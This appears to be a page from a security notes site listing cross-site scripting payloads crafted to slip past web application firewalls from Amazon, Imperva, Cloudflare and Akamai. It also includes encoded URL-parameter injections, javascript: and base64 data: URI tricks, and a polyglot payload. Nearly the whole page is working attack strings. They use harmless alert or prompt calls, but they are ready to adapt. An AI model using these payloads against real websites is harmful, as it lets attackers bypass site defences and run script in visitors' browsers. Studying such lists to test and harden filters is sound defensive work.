WAF Bypass 2024

source : https://github.com/Edr4/XSS-Bypass-Filters

#payloads
-------------

#Amazon

<details/open/id="&quot;"ontoggle=[JS]>    (no-click)

#Imperva

<details/open/id="&quot;"ontoggle=[JS]>     (no-click) 

#Cloudflare

<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img src=x on onerror=alert()>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
<svg onload=prompt%26%230000000040document.domain)>

<a"/onclick=(confirm)()>Click%20Here!   (href-bypass)

#Akamai

<details open id="' &quot;'"ontoggle=[JS]>   (no-click)

<math><edra href=Ja&Tab;vascript&colon;console.error(1)>HERE</edra></math>   (click)


#Extra XSS payloads 

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") > 

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
twitter.com/Botami143/stat…

# WAF / Cloudflare Bypass

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> 

<a href=[ ]"  onmouseover=prompt(1)//">XYZ</a>

<script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/

<blink/  onmouseover=prompt(1)>OnMouseOver 

<svg> <foreignObject width="100%" height="100%">     <body> <iframe src='javascript:confirm(10)'></iframe>     </body>   </foreignObject> </svg>


<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>


jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> "'alert(1)
PreviousEmbed XSS payload into image fileNextExtra payloads

Last updated